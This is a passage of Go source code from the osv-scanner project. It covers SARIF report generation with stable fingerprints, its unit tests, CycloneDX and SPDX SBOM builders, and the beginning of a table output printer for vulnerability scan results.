"D:\\\\path\\\\to\\\\scorecard-check-osv-e2e\\\\go.mod": "/path/to/scorecard-check-osv-e2e/go.mod", }, ), }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() got := groupFixedVersions(tt.args) tt.want.MatchJSON(t, got) }) } } func Test_mapIDsToGroupedSARIFFinding(t *testing.T) { t.Parallel() tests := []struct { name string args models.VulnerabilityResults want testutility.Snapshot }{ { args: testutility.LoadJSONFixtureWithWindowsReplacements[models.VulnerabilityResults](t, "testdata/test-vuln-results-a.json", map[string]string{ "/path/to/sub-rust-project/Cargo.lock": "D:\\\\path\\\\to\\\\sub-rust-project\\\\Cargo.lock", "/path/to/go.mod": "D:\\\\path\\\\to\\\\go.mod", }, ), want: testutility.NewSnapshot().WithWindowsReplacements( map[string]string{ "D:\\\\path\\\\to\\\\sub-rust-project\\\\Cargo.lock": "/path/to/sub-rust-project/Cargo.lock", "D:\\\\path\\\\to\\\\go.mod": "/path/to/go.mod", }, ), }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() got := mapIDsToGroupedSARIFFinding(&tt.args) tt.want.MatchJSON(t, got) }) } } ================================================ FILE: internal/output/sarif.go ================================================ package output import ( "crypto/sha256" "encoding/hex" "fmt" "io" "log" "path/filepath" "slices" "strconv" "strings" "text/template" "github.com/google/osv-scanner/v2/internal/identifiers" "github.com/google/osv-scanner/v2/internal/url" "github.com/google/osv-scanner/v2/internal/utility/results" "github.com/google/osv-scanner/v2/internal/utility/severity" "github.com/google/osv-scanner/v2/internal/utility/vulns" "github.com/google/osv-scanner/v2/internal/version" "github.com/google/osv-scanner/v2/pkg/models" "github.com/jedib0t/go-pretty/v6/table" "github.com/owenrumney/go-sarif/v3/pkg/report/v210/sarif" ) type HelpTemplateData struct { ID string AffectedPackagesTable string AffectedPackagePaths []string AliasedVulns []VulnDescription HasFixedVersion bool FixedVersionTable string PathSeparator string } type FixedPkgTableData struct { VulnID string PackageName string FixedVersion string } type VulnDescription struct { ID string Details string } // SARIFTemplate is used as the help text for findings. // // Note that double double-quotes are ("") are used to represent a single backtick (`)`, // since backticks cannot be escaped in raw strings const SARIFTemplate = ` **Your dependency is vulnerable to [{{.ID}}](https://osv.dev/{{.ID}})** {{- if gt (len .AliasedVulns) 1 }} (Also published as: {{range .AliasedVulns -}} {{if ne .ID $.ID -}} [{{.ID}}](https://osv.dev/{{.ID}}), {{end}}{{end}}) {{- end}}. {{range .AliasedVulns -}} ## [{{.ID}}](https://osv.dev/{{.ID}})
Details > {{.Details}}
{{end -}} --- ### Affected Packages {{.AffectedPackagesTable}} ## Remediation {{- if .HasFixedVersion }} To fix these vulnerabilities, update the vulnerabilities past the listed fixed versions below. ### Fixed Versions {{.FixedVersionTable}} {{- end}} If you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an ""osv-scanner.toml"" file located in the same directory as the lockfile containing the vulnerable dependency. See the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/ Add or append these values to the following config files to ignore this vulnerability: {{range .AffectedPackagePaths -}} ""{{.}}{{$.PathSeparator}}osv-scanner.toml"" """""" [[IgnoredVulns]] id = "{{$.ID}}" reason = "Your reason for ignoring this vulnerability" """""" {{end}} ` // createSARIFAffectedPkgTable creates a vulnerability table which includes the affected versions for a specific source file func createSARIFAffectedPkgTable(pkgWithSrc []pkgWithSource) table.Writer { helpTable := table.NewWriter() headerRow := table.Row{"Source", "Package Name", "Package Version"} hasDeprecated := false for _, ps := range pkgWithSrc { if ps.Package.Deprecated { hasDeprecated = true break } } if hasDeprecated { headerRow = append(headerRow, "Deprecated") } helpTable.AppendHeader(headerRow) for _, ps := range pkgWithSrc { ver := ps.Package.Version if ps.Package.Commit != "" { ver = ps.Package.Commit } row := table.Row{ ps.Source.String(), ps.Package.Name, ver, } if hasDeprecated { row = append(row, ps.Package.Deprecated) } helpTable.AppendRow(row) } return helpTable } // createSARIFFixedPkgTable creates a vulnerability table which includes the fixed versions for a specific source file func createSARIFFixedPkgTable(fixedPkgTableData []FixedPkgTableData) table.Writer { helpTable := table.NewWriter() helpTable.AppendHeader(table.Row{"Vulnerability ID", "Package Name", "Fixed Version"}) slices.SortFunc(fixedPkgTableData, func(a, b FixedPkgTableData) int { return strings.Compare(a.VulnID, b.VulnID) }) for _, data := range fixedPkgTableData { helpTable.AppendRow(table.Row{ data.VulnID, data.PackageName, data.FixedVersion, }) } return helpTable } // stripGitHubWorkspace strips /github/workspace/ from the given path. func stripGitHubWorkspace(path string) string { return strings.TrimPrefix(path, "/github/workspace/") } // createSARIFFingerprint generates a stable fingerprint for a SARIF result // to help GitHub deduplicate findings across scans. // // The fingerprint is computed from three components to ensure uniqueness while maintaining stability: // 1. vulnID: The vulnerability identifier (e.g., "CVE-2022-24713") - ensures different vulnerabilities // produce different fingerprints even for the same package // 2. artifactPath: The path to the lockfile (e.g., "/path/to/package.json") - distinguishes the same // vulnerability in different parts of a monorepo or different projects // 3. pkg: The package information (name, version, or commit) - differentiates the same vulnerability // across different versions or instances of a package // // These three components are combined because they uniquely identify a specific vulnerability finding: // the same vulnerability (vulnID) in the same package (pkg) detected in the same location (artifactPath) // should always be considered the same finding and produce the same fingerprint across scans. func createSARIFFingerprint(vulnID string, artifactPath string, pkg models.PackageInfo) string { // Create a stable string representation pkgStr := results.PkgToString(pkg) fingerprintData := fmt.Sprintf("%s:%s:%s", vulnID, artifactPath, pkgStr) // Hash the data to create a stable fingerprint hash := sha256.Sum256([]byte(fingerprintData)) return hex.EncodeToString(hash[:]) } // createSARIFHelpText returns the text for SARIF rule's help field func createSARIFHelpText(gv *groupedSARIFFinding) string { backtickSARIFTemplate := strings.ReplaceAll(strings.TrimSpace(SARIFTemplate), `""`, "`") helpTextTemplate, err := template.New("helpText").Parse(backtickSARIFTemplate) if err != nil { log.Panicf("failed to parse sarif help text template: %v", err) } vulnDescriptions := []VulnDescription{} fixedPkgTableData := []FixedPkgTableData{} hasFixedVersion := false for _, v := range gv.AliasedVulns { if v == nil { continue } for p, v2 := range vulns.GetFixedVersions(v) { slices.Sort(v2) fixedPkgTableData = append(fixedPkgTableData, FixedPkgTableData{ PackageName: p.Name, FixedVersion: strings.Join(slices.Compact(v2), ", "), VulnID: v.GetId(), }) hasFixedVersion = true } vulnDescriptions = append(vulnDescriptions, VulnDescription{ ID: v.GetId(), Details: strings.ReplaceAll(v.GetDetails(), "\n", "\n> "), }) } slices.SortFunc(vulnDescriptions, func(a, b VulnDescription) int { return identifiers.IDSortFunc(a.ID, b.ID) }) helpText := strings.Builder{} pkgWithSrcKeys := gv.PkgSource.StableKeys() affectedPackagePaths := []string{} for _, pws := range pkgWithSrcKeys { affectedPackagePaths = append(affectedPackagePaths, stripGitHubWorkspace(filepath.Dir(pws.Source.Path))) } // Compact to remove duplicates // (which should already be next to each other since it's sorted in the previous step) affectedPackagePaths = slices.Compact(affectedPackagePaths) err = helpTextTemplate.Execute(&helpText, HelpTemplateData{ ID: gv.DisplayID, AffectedPackagesTable: createSARIFAffectedPkgTable(pkgWithSrcKeys).RenderMarkdown(), AliasedVulns: vulnDescriptions, HasFixedVersion: hasFixedVersion, FixedVersionTable: createSARIFFixedPkgTable(fixedPkgTableData).RenderMarkdown(), AffectedPackagePaths: affectedPackagePaths, PathSeparator: string(filepath.Separator), }) if err != nil { log.Panicf("failed to execute sarif help text template") } return helpText.String() } // PrintSARIFReport prints SARIF output to outputWriter func PrintSARIFReport(vulnResult *models.VulnerabilityResults, outputWriter io.Writer) error { report := sarif.NewReport() run := sarif.NewRunWithInformationURI("osv-scanner", "https://github.com/google/osv-scanner") run.Tool.Driver.WithVersion(version.OSVVersion) vulnIDMap := mapIDsToGroupedSARIFFinding(vulnResult) // Sort the IDs to have deterministic loop of vulnIDMap vulnIDs := make([]string, 0, len(vulnIDMap)) for vulnID := range vulnIDMap { vulnIDs = append(vulnIDs, vulnID) } slices.Sort(vulnIDs) for _, vulnID := range vulnIDs { gv := vulnIDMap[vulnID] if gv == nil { continue } helpText := createSARIFHelpText(gv) // Pick the "best" description from the alias group based on the source. // Set short description to the first entry with a non-empty summary // Set long description to the same entry as short description // or use a random long description. var shortDescription, longDescription string ids := slices.Clone(gv.AliasedIDList) slices.SortFunc(ids, identifiers.IDSortFuncForDescription) for _, id := range ids { v := gv.AliasedVulns[id] if v == nil { continue } longDescription = v.GetDetails() if v.GetSummary() != "" { shortDescription = fmt.Sprintf("%s: %s", gv.DisplayID, v.GetSummary()) break } } // If no advisory for this vulnerability has a summary field, // just show the ID in the shortDescription if shortDescription == "" { shortDescription = gv.DisplayID } rule := run.AddRule(gv.DisplayID) if rule == nil { // Skipping SARIF rule for empty ID continue } rule.WithName(gv.DisplayID). WithShortDescription(sarif.NewMultiformatMessageString().WithText(shortDescription).WithMarkdown(shortDescription)). WithFullDescription(sarif.NewMultiformatMessageString().WithText(longDescription).WithMarkdown(longDescription)). WithMarkdownHelp(helpText) // Find the worst severity score var worstScore float64 = -1 for _, v := range gv.AliasedVulns { if v == nil || v.GetSeverity() == nil { continue } score, _, _ := severity.CalculateOverallScore(v.GetSeverity()) if score > worstScore { worstScore = score } } if worstScore >= 0 { var bag = sarif.NewPropertyBag() bag.Add("security-severity", strconv.FormatFloat(worstScore, 'f', -1, 64)) rule.WithProperties(bag) } if gv.AliasedIDList == nil { gv.AliasedIDList = []string{} } rule.DeprecatedIds = gv.AliasedIDList for _, pws := range gv.PkgSource.StableKeys() { artifactPath := stripGitHubWorkspace(pws.Source.Path) if filepath.IsAbs(artifactPath) { // this only errors if the file path is not absolute, // which we've already confirmed is not the case p, err := url.FromFilePath(artifactPath) if err == nil && p != nil { artifactPath = p.String() } } run.AddDistinctArtifact(artifactPath) alsoKnownAsStr := "" if len(gv.AliasedIDList) > 1 { alsoKnownAsStr = fmt.Sprintf(" (also known as '%s')", strings.Join(gv.AliasedIDList[1:], "', '")) } // Generate a stable fingerprint for deduplication fingerprint := createSARIFFingerprint(gv.DisplayID, artifactPath, pws.Package) run.CreateResultForRule(gv.DisplayID). WithLevel("warning"). WithMessage( sarif.NewTextMessage( fmt.Sprintf( "Package '%s' is vulnerable to '%s'%s.", results.PkgToString(pws.Package), gv.DisplayID, alsoKnownAsStr, ))). AddLocation( sarif.NewLocationWithPhysicalLocation( sarif.NewPhysicalLocation(). WithArtifactLocation(sarif.NewSimpleArtifactLocation(artifactPath)), )). WithPartialFingerprints(map[string]string{ // Use "primaryLocationLineHash" as the key for the fingerprint. // This is the standard key that GitHub Advanced Security uses to deduplicate // code scanning alerts across multiple runs. // // Reference: https://docs.github.com/en/code-security/code-scanning/integrating-with-code-scanning/sarif-support-for-code-scanning#preventing-duplicate-alerts-using-fingerprints // // GitHub's documentation states: "GitHub uses the primaryLocationLineHash property // to detect results that are logically the same, so they can be shown only once, // in the correct branch and pull request." // // For dependency scanning (as opposed to source code analysis), we don't have // line numbers in the traditional sense, so our fingerprint is based on the // combination of vulnerability ID, package, and location rather than source code lines. "primaryLocationLineHash": fingerprint, }) } } report.AddRun(run) err := report.PrettyWrite(outputWriter) if err != nil { return err } fmt.Fprintln(outputWriter) return nil } ================================================ FILE: internal/output/sarif_fingerprint_test.go ================================================ package output import ( "fmt" "testing" "github.com/google/osv-scanner/v2/pkg/models" ) // Common test parameter values used by both test functions var ( testVulnIDs = []string{"CVE-2021-1234", "CVE-2022-5678"} testArtifactPaths = []string{"/path/to/package.json", "/different/path/go.mod"} testPackages = []models.PackageInfo{ {Name: "pkg1", Version: "1.0.0"}, {Name: "pkg2", Version: "1.0.0"}, {Name: "pkg1", Version: "2.0.0"}, {Name: "pkg1", Commit: "abc123"}, } ) func Test_createSARIFFingerprint(t *testing.T) { t.Parallel() // Generate all combinations from common test parameters for i, vulnID := range testVulnIDs { for j, artifactPath := range testArtifactPaths { for k, pkg := range testPackages { testName := fmt.Sprintf("vuln_%d_path_%d_pkg_%d", i, j, k) t.Run(testName, func(t *testing.T) { t.Parallel() got := createSARIFFingerprint(vulnID, artifactPath, pkg) // Verify it returns a 64-character hex string (SHA-256 produces 32 bytes = 64 hex chars) if len(got) != 64 { t.Errorf("createSARIFFingerprint() returned fingerprint of length %d, want 64", len(got)) } // Verify determinism by calling it again with the same inputs got2 := createSARIFFingerprint(vulnID, artifactPath, pkg) if got != got2 { t.Errorf("createSARIFFingerprint() is not deterministic: first call = %v, second call = %v", got, got2) } }) } } } } func Test_createSARIFFingerprint_DifferentInputs(t *testing.T) { t.Parallel() // Generate all combinations from common test parameters and their fingerprints type testCase struct { vulnID string artifactPath string pkg models.PackageInfo fingerprint string } testCases := make([]testCase, 0, len(testPackages)*len(testArtifactPaths)*len(testVulnIDs)) for _, vulnID := range testVulnIDs { for _, artifactPath := range testArtifactPaths { for _, pkg := range testPackages { fp := createSARIFFingerprint(vulnID, artifactPath, pkg) testCases = append(testCases, testCase{ vulnID: vulnID, artifactPath: artifactPath, pkg: pkg, fingerprint: fp, }) } } } // Verify that all fingerprints are unique for i := range testCases { for j := i + 1; j < len(testCases); j++ { if testCases[i].fingerprint == testCases[j].fingerprint { t.Errorf("Expected different fingerprints but got same:\n"+ " Input 1: vulnID=%q, path=%q, pkg=%+v\n"+ " Input 2: vulnID=%q, path=%q, pkg=%+v\n"+ " Fingerprint: %s", testCases[i].vulnID, testCases[i].artifactPath, testCases[i].pkg, testCases[j].vulnID, testCases[j].artifactPath, testCases[j].pkg, testCases[i].fingerprint) } } } } ================================================ FILE: internal/output/sarif_internal_test.go ================================================ package output import ( "testing" "github.com/google/osv-scanner/v2/internal/testutility" ) func Test_createSARIFHelpText(t *testing.T) { t.Parallel() tests := []struct { name string args groupedSARIFFinding want testutility.Snapshot }{ { args: testutility.LoadJSONFixture[groupedSARIFFinding](t, "testdata/vuln-grouped.json"), want: testutility.NewSnapshot().WithWindowsReplacements(map[string]string{ "\\path\\to\\sub-rust-project\\osv-scanner.toml": "/path/to/sub-rust-project/osv-scanner.toml", }), }, { args: testutility.LoadJSONFixture[groupedSARIFFinding](t, "testdata/commit-grouped.json"), want: testutility.NewSnapshot().WithWindowsReplacements(map[string]string{ "\\Documents\\Project\\engine\\osv-scanner.toml": "/Documents/Project/engine/osv-scanner.toml", }), }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() got := createSARIFHelpText(&tt.args) tt.want.MatchText(t, got) }) } } ================================================ FILE: internal/output/sarif_test.go ================================================ package output_test import ( "bytes" "encoding/json" "strings" "testing" "github.com/google/osv-scanner/v2/internal/output" "github.com/google/osv-scanner/v2/internal/testutility" "github.com/google/osv-scanner/v2/pkg/models" ) func TestPrintSARIFReport(t *testing.T) { t.Parallel() tests := []struct { name string args models.VulnerabilityResults want testutility.Snapshot }{ { name: "", args: testutility.LoadJSONFixtureWithWindowsReplacements[models.VulnerabilityResults](t, "testdata/test-vuln-results-a.json", map[string]string{ "/path/to/sub-rust-project/Cargo.lock": "D:\\\\path\\\\to\\\\sub-rust-project\\\\Cargo.lock", "/path/to/go.mod": "D:\\\\path\\\\to\\\\go.mod", }, ), want: testutility.NewSnapshot().WithWindowsReplacements( map[string]string{ "lockfile:D:\\\\path\\\\to\\\\sub-rust-project\\\\Cargo.lock": "lockfile:/path/to/sub-rust-project/Cargo.lock", "lockfile:D:\\\\path\\\\to\\\\go.mod": "lockfile:/path/to/go.mod", "D:\\\\path\\\\to\\\\sub-rust-project\\\\osv-scanner.toml": "/path/to/sub-rust-project/osv-scanner.toml", "D:\\\\path\\\\to\\\\osv-scanner.toml": "/path/to/osv-scanner.toml", "file:///D:/path/to": "file:///path/to", }, ), }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() jsonStructure := buildJSONSarifReport(t, &tt.args) tt.want.MatchJSON(t, jsonStructure) }) } } func TestPrintSARIFReport_WithVulnerabilities(t *testing.T) { t.Parallel() cwd := testutility.GetCurrentWorkingDirectory(t) testOutputWithVulnerabilities(t, func(t *testing.T, args outputTestCaseArgs) { t.Helper() jsonStructure := buildJSONSarifReport(t, args.vulnResult) testutility.NewSnapshot().WithWindowsReplacements( map[string]string{ strings.ReplaceAll(cwd, "\\", "\\\\"): strings.ReplaceAll(cwd, "\\", "/"), "\\\\path\\\\to\\\\my\\\\first\\\\osv-scanner.toml": "/path/to/my/first/osv-scanner.toml", "\\\\path\\\\to\\\\my\\\\second\\\\osv-scanner.toml": "/path/to/my/second/osv-scanner.toml", "\\\\path\\\\to\\\\my\\\\third\\\\osv-scanner.toml": "/path/to/my/third/osv-scanner.toml", }).MatchJSON(t, jsonStructure) }) } func TestPrintSARIFReport_WithLicenseViolations(t *testing.T) { t.Parallel() cwd := testutility.GetCurrentWorkingDirectory(t) testOutputWithLicenseViolations(t, func(t *testing.T, args outputTestCaseArgs) { t.Helper() jsonStructure := buildJSONSarifReport(t, args.vulnResult) testutility.NewSnapshot().WithWindowsReplacements( map[string]string{ strings.ReplaceAll(cwd, "\\", "\\\\"): strings.ReplaceAll(cwd, "\\", "/"), "\\\\path\\\\to\\\\my\\\\first\\\\osv-scanner.toml": "/path/to/my/first/osv-scanner.toml", "\\\\path\\\\to\\\\my\\\\second\\\\osv-scanner.toml": "/path/to/my/second/osv-scanner.toml", "\\\\path\\\\to\\\\my\\\\third\\\\osv-scanner.toml": "/path/to/my/third/osv-scanner.toml", }).MatchJSON(t, jsonStructure) }) } func TestPrintSARIFReport_WithMixedIssues(t *testing.T) { t.Parallel() cwd := testutility.GetCurrentWorkingDirectory(t) testOutputWithMixedIssues(t, func(t *testing.T, args outputTestCaseArgs) { t.Helper() jsonStructure := buildJSONSarifReport(t, args.vulnResult) testutility.NewSnapshot().WithWindowsReplacements( map[string]string{ strings.ReplaceAll(cwd, "\\", "\\\\"): strings.ReplaceAll(cwd, "\\", "/"), "\\\\path\\\\to\\\\my\\\\first\\\\osv-scanner.toml": "/path/to/my/first/osv-scanner.toml", "\\\\path\\\\to\\\\my\\\\second\\\\osv-scanner.toml": "/path/to/my/second/osv-scanner.toml", "\\\\path\\\\to\\\\my\\\\third\\\\osv-scanner.toml": "/path/to/my/third/osv-scanner.toml", }).MatchJSON(t, jsonStructure) }) } func buildJSONSarifReport(t *testing.T, res *models.VulnerabilityResults) map[string]any { t.Helper() outputWriter := &bytes.Buffer{} err := output.PrintSARIFReport(res, outputWriter) if err != nil { t.Errorf("Error writing SARIF output: %s", err) } replacedJSON := testutility.ReplaceJSONInput( t, outputWriter.String(), testutility.ReplacePartialFingerprintHash.Path, testutility.ReplacePartialFingerprintHash.ReplaceFunc, ) jsonStructure := map[string]any{} err = json.NewDecoder(bytes.NewBufferString(replacedJSON)).Decode(&jsonStructure) if err != nil { t.Errorf("Error decoding SARIF output: %s", err) } return jsonStructure } ================================================ FILE: internal/output/sbom/cyclonedx_1_4.go ================================================ // Package sbom provides functionality to generate SBOMs from scan results. package sbom import ( "github.com/google/osv-scanner/v2/pkg/models" "github.com/CycloneDX/cyclonedx-go" ) func ToCycloneDX14Bom(uniquePackages map[string]models.PackageVulns) *cyclonedx.BOM { bom := buildCycloneDXBom(uniquePackages) bom.JSONSchema = cycloneDx14Schema bom.SpecVersion = cyclonedx.SpecVersion1_4 return bom } ================================================ FILE: internal/output/sbom/cyclonedx_1_5.go ================================================ package sbom import ( "github.com/CycloneDX/cyclonedx-go" "github.com/google/osv-scanner/v2/pkg/models" ) func ToCycloneDX15Bom(uniquePackages map[string]models.PackageVulns) *cyclonedx.BOM { bom := buildCycloneDXBom(uniquePackages) bom.JSONSchema = cycloneDx15Schema bom.SpecVersion = cyclonedx.SpecVersion1_5 return bom } ================================================ FILE: internal/output/sbom/cyclonedx_1_6.go ================================================ package sbom import ( "github.com/CycloneDX/cyclonedx-go" "github.com/google/osv-scanner/v2/pkg/models" ) func ToCycloneDX16Bom(uniquePackages map[string]models.PackageVulns) *cyclonedx.BOM { bom := buildCycloneDXBom(uniquePackages) bom.JSONSchema = cycloneDx16Schema bom.SpecVersion = cyclonedx.SpecVersion1_6 return bom } ================================================ FILE: internal/output/sbom/cyclonedx_common.go ================================================ package sbom import ( "slices" "strings" "time" "github.com/CycloneDX/cyclonedx-go" "github.com/google/osv-scanner/v2/pkg/models" "github.com/ossf/osv-schema/bindings/go/osvschema" "google.golang.org/protobuf/types/known/timestamppb" ) func buildCycloneDXBom(uniquePackages map[string]models.PackageVulns) *cyclonedx.BOM { bom := cyclonedx.NewBOM() components := make([]cyclonedx.Component, 0, len(uniquePackages)) vulnerabilities := make(map[string]cyclonedx.Vulnerability) for packageURL, packageDetail := range uniquePackages { component := cyclonedx.Component{} component.Type = libraryComponentType component.BOMRef = packageURL component.PackageURL = packageURL component.Name = packageDetail.Package.Name component.Version = packageDetail.Package.Version addDeprecatedProperty(&component, packageDetail) fillLicenses(&component, packageDetail) addVulnerabilities(vulnerabilities, packageDetail) components = append(components, component) } slices.SortFunc(components, func(a, b cyclonedx.Component) int { return strings.Compare(a.PackageURL, b.PackageURL) }) bomVulnerabilities := make([]cyclonedx.Vulnerability, 0, len(vulnerabilities)) for _, vulnerability := range vulnerabilities { bomVulnerabilities = append(bomVulnerabilities, vulnerability) } slices.SortFunc(bomVulnerabilities, func(a, b cyclonedx.Vulnerability) int { return strings.Compare(a.ID, b.ID) }) bom.Components = &components bom.Vulnerabilities = &bomVulnerabilities return bom } func fillLicenses(component *cyclonedx.Component, packageDetail models.PackageVulns) { licenses := make(cyclonedx.Licenses, len(packageDetail.Licenses)) for index, license := range packageDetail.Licenses { licenses[index] = cyclonedx.LicenseChoice{ License: &cyclonedx.License{ ID: string(license), }, } } component.Licenses = &licenses } func addVulnerabilities(vulnerabilities map[string]cyclonedx.Vulnerability, packageDetail models.PackageVulns) { for i := range packageDetail.Vulnerabilities { vulnerability := packageDetail.Vulnerabilities[i] if _, exists := vulnerabilities[vulnerability.GetId()]; exists { continue } // It doesn't exist yet, lets add it vulnerabilities[vulnerability.GetId()] = cyclonedx.Vulnerability{ ID: vulnerability.GetId(), Updated: formatDateIfExists(vulnerability.GetModified()), Published: formatDateIfExists(vulnerability.GetPublished()), Rejected: formatDateIfExists(vulnerability.GetWithdrawn()), References: buildReferences(vulnerability), Description: vulnerability.GetSummary(), Detail: vulnerability.GetDetails(), Affects: buildAffectedPackages(vulnerability), Ratings: buildRatings(vulnerability), Advisories: buildAdvisories(vulnerability), Credits: buildCredits(vulnerability), } } } func addDeprecatedProperty(component *cyclonedx.Component, packageDetail models.PackageVulns) { if !packageDetail.Package.Deprecated { return } component.Properties = &[]cyclonedx.Property{ { Name: "deprecated", Value: "true", }, } } func formatDateIfExists(ts *timestamppb.Timestamp) string { if ts == nil { return "" } t := ts.AsTime() if t.IsZero() { return "" } return t.Format(time.RFC3339) } func buildCredits(vulnerability *osvschema.Vulnerability) *cyclonedx.Credits { organizations := make([]cyclonedx.OrganizationalEntity, len(vulnerability.GetCredits())) for index, credit := range vulnerability.GetCredits() { organizations[index] = cyclonedx.OrganizationalEntity{ Name: credit.GetName(), URL: &vulnerability.GetCredits()[index].Contact, } } return &cyclonedx.Credits{ Organizations: &organizations, } } func buildAffectedPackages(vulnerability *osvschema.Vulnerability) *[]cyclonedx.Affects { uniqueRefs := make(map[string]bool) affectedPackages := make([]cyclonedx.Affects, 0) for _, affected := range vulnerability.GetAffected() { if _, exists := uniqueRefs[affected.GetPackage().GetPurl()]; exists { continue } uniqueRefs[affected.GetPackage().GetPurl()] = true affectedPackages = append(affectedPackages, cyclonedx.Affects{ Ref: affected.GetPackage().GetPurl(), }) } return &affectedPackages } func buildRatings(vulnerability *osvschema.Vulnerability) *[]cyclonedx.VulnerabilityRating { ratings := make([]cyclonedx.VulnerabilityRating, len(vulnerability.GetSeverity())) for index, severity := range vulnerability.GetSeverity() { ratings[index] = cyclonedx.VulnerabilityRating{ Method: SeverityMapper[severity.GetType()], Vector: severity.GetScore(), } } return &ratings } func buildReferences(vulnerability *osvschema.Vulnerability) *[]cyclonedx.VulnerabilityReference { references := make([]cyclonedx.VulnerabilityReference, len(vulnerability.GetAliases())) for index, alias := range vulnerability.GetAliases() { references[index] = cyclonedx.VulnerabilityReference{ ID: alias, Source: &cyclonedx.Source{}, } } return &references } func buildAdvisories(vulnerability *osvschema.Vulnerability) *[]cyclonedx.Advisory { advisories := make([]cyclonedx.Advisory, 0) for _, reference := range vulnerability.GetReferences() { if reference.GetType() != osvschema.Reference_ADVISORY { continue } advisories = append(advisories, cyclonedx.Advisory{ URL: reference.GetUrl(), }) } return &advisories } ================================================ FILE: internal/output/sbom/models.go ================================================ package sbom import ( "github.com/google/osv-scanner/v2/pkg/models" "github.com/ossf/osv-schema/bindings/go/osvschema" "github.com/CycloneDX/cyclonedx-go" ) var SpecVersionToBomCreator = map[models.CycloneDXVersion]CycloneDXBomCreator{ models.CycloneDXVersion14: ToCycloneDX14Bom, models.CycloneDXVersion15: ToCycloneDX15Bom, models.CycloneDXVersion16: ToCycloneDX16Bom, } type CycloneDXBomCreator func(packageSources map[string]models.PackageVulns) *cyclonedx.BOM const ( cycloneDx14Schema = "http://cyclonedx.org/schema/bom-1.4.schema.json" cycloneDx15Schema = "http://cyclonedx.org/schema/bom-1.5.schema.json" cycloneDx16Schema = "http://cyclonedx.org/schema/bom-1.6.schema.json" ) const libraryComponentType = "library" var SeverityMapper = map[osvschema.Severity_Type]cyclonedx.ScoringMethod{ osvschema.Severity_CVSS_V2: cyclonedx.ScoringMethodCVSSv2, osvschema.Severity_CVSS_V3: cyclonedx.ScoringMethodCVSSv3, osvschema.Severity_CVSS_V4: cyclonedx.ScoringMethodCVSSv4, } ================================================ FILE: internal/output/spdx.go ================================================ package output import ( "encoding/json" "io" scalibr "github.com/google/osv-scalibr" "github.com/google/osv-scalibr/converter/spdx" "github.com/google/osv-scanner/v2/pkg/models" ) // PrintSPDXResults writes results to the provided writer in SPDX format func PrintSPDXResults(vulnResult *models.VulnerabilityResults, outputWriter io.Writer) error { scanResult := &scalibr.ScanResult{} for _, source := range vulnResult.Results { for _, pkg := range source.Packages { scanResult.Inventory.Packages = append(scanResult.Inventory.Packages, pkg.Package.Inventory) } } // TODO(#1783): Allow user configuration doc := spdx.ToSPDX23(scanResult.Inventory, spdx.Config{}) encoder := json.NewEncoder(outputWriter) encoder.SetIndent("", " ") return encoder.Encode(doc) } ================================================ FILE: internal/output/spdx_test.go ================================================ package output_test import ( "bytes" "testing" "github.com/google/osv-scanner/v2/internal/cachedregexp" "github.com/google/osv-scanner/v2/internal/output" "github.com/google/osv-scanner/v2/internal/testutility" "github.com/jedib0t/go-pretty/v6/text" ) func normalizeSPDXOutput(t *testing.T, str string) string { t.Helper() str = text.StripEscape(str) str = cachedregexp.MustCompile(`[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}`).ReplaceAllString(str, ``) str = cachedregexp.MustCompile(`"created": ".+T.+Z"`).ReplaceAllString(str, `"created": ""`) return str } func TestPrintSPDXResults_WithVulnerabilities(t *testing.T) { t.Parallel() testOutputWithVulnerabilities(t, func(t *testing.T, args outputTestCaseArgs) { t.Helper() outputWriter := &bytes.Buffer{} err := output.PrintSPDXResults(args.vulnResult, outputWriter) if err != nil { t.Errorf("%v", err) } testutility.NewSnapshot().MatchText(t, normalizeSPDXOutput(t, outputWriter.String())) }) } func TestPrintSPDXResults_WithLicenseViolations(t *testing.T) { t.Parallel() testOutputWithLicenseViolations(t, func(t *testing.T, args outputTestCaseArgs) { t.Helper() outputWriter := &bytes.Buffer{} err := output.PrintSPDXResults(args.vulnResult, outputWriter) if err != nil { t.Errorf("%v", err) } testutility.NewSnapshot().MatchText(t, normalizeSPDXOutput(t, outputWriter.String())) }) } func TestPrintSPDXResults_WithMixedIssues(t *testing.T) { t.Parallel() testOutputWithMixedIssues(t, func(t *testing.T, args outputTestCaseArgs) { t.Helper() outputWriter := &bytes.Buffer{} err := output.PrintSPDXResults(args.vulnResult, outputWriter) if err != nil { t.Errorf("%v", err) } testutility.NewSnapshot().MatchText(t, normalizeSPDXOutput(t, outputWriter.String())) }) } ================================================ FILE: internal/output/table.go ================================================ package output import ( "fmt" "io" "path/filepath" "strings" "github.com/google/osv-scalibr/inventory/osvecosystem" depgroups "github.com/google/osv-scanner/v2/internal/utility/depgroup" "github.com/google/osv-scanner/v2/internal/utility/results" "github.com/google/osv-scanner/v2/internal/utility/severity" "github.com/google/osv-scanner/v2/pkg/models" "github.com/ossf/osv-schema/bindings/go/osvschema" "github.com/jedib0t/go-pretty/v6/table" "github.com/jedib0t/go-pretty/v6/text" ) // OSVBaseVulnerabilityURL is the base URL for detailed vulnerability views. // Copied in from osv package to avoid referencing the osv package unnecessarily const OSVBaseVulnerabilityURL = "https://osv.dev/" // PrintTableResults prints the osv scan results into a human friendly table. func PrintTableResults(vulnResult *models.VulnerabilityResults, outputWriter io.Writer, terminalWidth int, showAllVulns bool) { if terminalWidth <= 0 { text.DisableColors() } outputResult := BuildResults(vulnResult) // Add a newline to separate results from logs. fmt.Fprintln(outputWriter) // Render the vulnerabilities. if containsOSResult(outputResult) { printSummaryResult(outputResult, outputWriter, terminalWidth, showAllVulns) } else { // Print summary at the top printSummary(outputResult, outputWriter) outputTable := newTable(outputWriter, terminalWidth) outputTable = tableBuilder(outputTable, outputResult, showAllVulns) if outputTable.Length() != 0 { outputTable.Render() } // Render the licenses if any. licenseConfig := vulnResult.ExperimentalAnalysisConfig.Licenses if licenseConfig.Summary { buildLicenseSummaryTable(outputWriter, terminalWidth, vulnResult) } if len(licenseConfig.Allowlist) > 0 { buildLicenseViolationsTable(outputWriter, terminalWidth, vulnResult) } // Render deprecated packages if any. if outputResult.PkgDeprecatedCount > 0 { 